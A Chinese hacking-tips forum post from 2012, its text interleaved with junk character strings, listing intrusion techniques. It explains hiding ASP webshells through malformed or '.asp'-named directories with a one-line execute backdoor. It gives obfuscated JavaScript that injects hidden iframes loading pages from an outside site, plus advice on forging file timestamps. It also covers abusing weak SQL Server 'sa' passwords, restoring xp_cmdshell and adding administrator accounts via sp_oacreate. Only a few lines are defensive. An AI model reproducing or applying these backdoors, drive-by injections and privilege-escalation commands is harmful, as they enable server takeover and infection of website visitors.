7 u' }5 r9 L7 Z$ s, Q8 \53、隐藏ASP后门的两种方法; K: N) i0 F% }! i5 b7 y" f
1、建立非标准目录:mkdir images..\6 J4 r0 @& J( ~7 S' U: W e0 j6 |
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
, [5 C [/ ~2 e, a通过web访问ASP木马:http://ip/images../news.asp?action=login/ M( h6 o2 @" t- Y, K9 o2 V
如何删除非标准目录:rmdir images..\ /s
4 E- a' }# \' g0 E$ S A2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
, U& _! d8 p7 w6 l1 ~/ ]mkdir programme.asp
/ D: I9 I# t2 g6 h4 |新建1.txt文件内容:<!--#include file=”12.jpg”-->
; ~7 f9 _( y1 f( ?新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
* g% U% E4 Q% t+ k: yattrib +H +S programme.asp+ d3 {% q/ |) Y- K$ _" e7 x3 A
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt: ~: [6 s* P2 Q/ \) N* l' X: o
! z0 \+ U1 o6 X9 V& |* f54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。2 z/ o# d2 M r" |
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
0 H) g- q# ]- G! ^
. b, T5 @% N! v7 r! \55、JS隐蔽挂马/ o# @0 x* s/ ] |
1.9 U9 ?/ E5 [! i; v
var tr4c3="<iframe src=ht";& Q4 m Z/ d' q: g: g, V. z7 R
tr4c3 = tr4c3+"tp:/";
$ J( ~( `5 V! ~' H9 U: ytr4c3 = tr4c3+"/ww";. }1 T/ _; ?/ B1 t
tr4c3 = tr4c3+"w.tr4";# q# I: A2 Y u/ k" g
tr4c3 = tr4c3+"c3.com/inc/m";- c+ R: |- n! n4 f, N
tr4c3 = tr4c3+"m.htm style="display:none"></i";
0 G3 Y+ V& K5 L) k8 b4 btr4c3 =tr4c3+"frame>'";1 Q+ M5 [, D5 d$ o4 ^% Z1 g
document.write(tr4c3);; o2 D Z* O4 W. @
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。0 ]5 M* I% U. R( v. N
) G! `& [) U7 ~0 L7 P6 {
2.+ y$ a/ w+ o& u$ M! E
转换进制,然后用EVAL执行。如& k; q0 a2 H, G. V5 |7 A! h* `
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");2 w' Z5 W8 `% p3 S& A5 K
不过这个有点显眼。' o6 C4 B; i6 @7 S( X" D: w5 N
3.9 I" F# E4 I) d* V0 d
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
3 }7 d6 ^# o6 G D- o1 b最后一点,别忘了把文件的时间也修改下。
: Q4 V. M# g' ?% N7 r$ h& @. |& ~+ R: ]# z. E* T* P/ M
56.3389终端入侵常用DOS命令
. {, [" i4 a! P. _) k' u) staskkill taskkill /PID 1248 /t
/ D" L3 S! I3 }( j4 h- Z6 b, h3 d. P p0 }/ `$ X1 O
tasklist 查进程
) `. ^0 K" s2 G
- Q! [9 S$ Z: k! ]* {cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限: z' A, b0 T) k# ]
iisreset /reboot% t) F( y2 ? ^* \2 B; v5 @5 l
tsshutdn /reboot /delay:1 重起服务器
: T% x- h4 @) b! ~$ D6 N$ I# v; j4 i! [7 ?) U! K+ o+ F
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
0 \5 U' Q+ } k% m. R2 X" a7 \. v' n8 D0 H
query user 查看当前终端用户在线情况
' T7 ]: C! I5 g# s: w
! C% n1 D) F( s, Q) Q3 Z要显示有关所有会话使用的进程的信息,请键入:query process *
8 J6 \9 K% ]6 \. }% [
. Z7 A# t: {. z/ L+ ~' i4 V& H要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
+ M3 \/ O' S! A+ M
Y8 q0 ^! I2 ^7 j要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
/ ?9 G: w0 `4 _$ ?3 V3 Y" h
) c- A) W# p$ `/ C/ B0 `要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02; B; l$ {3 L& V
" C: }5 j0 S( @, S9 A" c$ \; I" c命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启% Y) P8 ~8 s: E9 w
! M& ]. q, L( K( _: K0 ]' _8 ~5 X4 U命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
( n; z- J* z& N* F* o
, I* Q0 K/ z7 Y8 q. r: d4 _* J) a命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。4 S9 t3 i/ F: H! ]% a% W
6 [6 @3 Y) V" ]/ B) @) \
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
, ]0 W- y# e! \0 H) n+ b- H
. u3 z: K3 G8 ~( j1 Z$ o56、在地址栏或按Ctrl+O,输入:6 T1 F4 _# k/ O5 f* x+ S3 h
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;9 A: d# W: f1 ?
5 {5 v2 K' ?8 g. `+ t; K5 T% o% j, l源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。; G3 W, `; }3 c7 o# p: I4 z
0 K/ I9 \1 I" U6 v( R4 |1 a57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
9 |" z: F/ b ^" H用net localgroup administrators是可以看到管理组下,加了$的用户的。! T5 b0 a5 i: ~5 [4 }3 v4 `
3 ]- B1 |. T9 u+ n# V! e" D
58、 sa弱口令相关命令
" B6 R" \, W7 t m) I/ g2 J+ w8 @5 k9 x
一.更改sa口令方法:
. l: u+ Q5 k* [; D用sql综合利用工具连接后,执行命令:
, j) o2 F, i* c" a4 Sexec sp_password NULL,'20001001','sa'
9 Q# Q/ @& Q( ^' ?5 ?/ W(提示:慎用!)
- f/ F2 e6 C" @* b0 |) _: D) y/ u* R4 {% ?; b# ~6 J3 J% ~
二.简单修补sa弱口令.$ E! l; I) B3 T6 d2 X# Y
& s) S v) `6 K1 F. k方法1:查询分离器连接后执行:2 K4 w' U) ~: v/ f% D5 v
if exists (select * from
5 e! }/ b. O6 a' zdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
4 R+ z( L/ V+ K u" i4 U) Q: M5 XOBJECTPROPERTY(id, N'IsExtendedProc') = 1)
" a' k" C( y( w7 x! X. p1 A
; L1 c; p1 h1 O. C- i9 texec sp_dropextendedproc N'[dbo].[xp_cmdshell]'' \' s' s; f) u, Z3 }1 Y/ h
) k1 L- J& f( l% J" M- O! ]
GO
2 P0 M: W- p, S \( L( Y& n% o! Z5 O& L8 A) y8 s9 C
然后按F5键命令执行完毕9 c" f4 U# {" K, Q! G. a9 U6 N0 I3 s
+ w) `; I1 ^+ q
方法2:查询分离器连接后
' _4 P6 ~8 W5 n7 M1 _: \8 ]+ X第一步执行:use master
7 `. Y; A2 a/ g$ {第二步执行:sp_dropextendedproc 'xp_cmdshell'
" z/ O( e7 {0 D- s0 X/ s! K然后按F5键命令执行完毕( K! ^" T S, l8 i
% f' \/ G/ P2 g& z8 ]0 C9 W* f7 Y3 Y2 X# G8 Y4 m
三.常见情况恢复执行xp_cmdshell.. ^0 M8 J3 `; [3 y, Z# c0 T
, ^# t7 J5 e! S" q' Y5 T1 q' I7 v
4 D' g6 l5 e# ?7 n2 J1 未能找到存储过程'master..xpcmdshell'.' d4 K9 O! t! D' u% I y
恢复方法:查询分离器连接后,; l) ^% a6 _; c# `# x |: [
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
( j# ^6 q9 I l* s第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'0 m5 i8 {$ M4 f" F( h$ K$ x
然后按F5键命令执行完毕
) s- B7 Y# U: o" I+ Q; e, J
2 t9 d( x' ^9 ^" Z2 ?2 n5 @- t% _2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
6 b( s( J/ S) l恢复方法:查询分离器连接后,
# ?3 l7 K; Z, q2 D第一步执行:sp_dropextendedproc "xp_cmdshell"8 ?1 S' e3 c3 i4 s ~
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
4 S; F* i( I0 T( W: @然后按F5键命令执行完毕3 }: ?3 j" \/ y
% o; b N" S9 R# A8 S$ j5 g
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。): ~7 G! \( i5 y, l" p5 q
恢复方法:查询分离器连接后,: L4 t) v2 N1 Y/ | Y8 S# {
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'4 ?6 T5 _: p& H q
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
0 g; m9 }1 ?3 H9 R }$ W然后按F5键命令执行完毕3 P( c7 t6 P0 [
f1 j+ i$ `6 C# u! O. Q g
四.终极方法.$ h6 Y9 s* ~" z" x1 G
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:! [$ t8 s4 l T% ~
查询分离器连接后,! u, F0 E5 O/ z& f3 P8 i
2000servser系统:- ^5 s( {! f3 M" D7 C
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'3 M5 u$ J1 @9 g9 [
5 x: x+ j, K4 [2 ~$ l: S
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
" E- p7 z- h$ P$ I" r
, m7 P( W$ d. X& j! |9 e9 n' Z0 axp或2003server系统:
7 |9 k, T3 w% N1 m4 a
' Y* |# s4 e3 u: K1 Gdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
. ]! F2 L$ U: w" Z9 T' g: A. @
8 [4 }, l, \( v0 k) U9 Sdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'7 J1 o7 c w- g
|
发表于 2012-9-15 14:13:15
收藏
支持
反对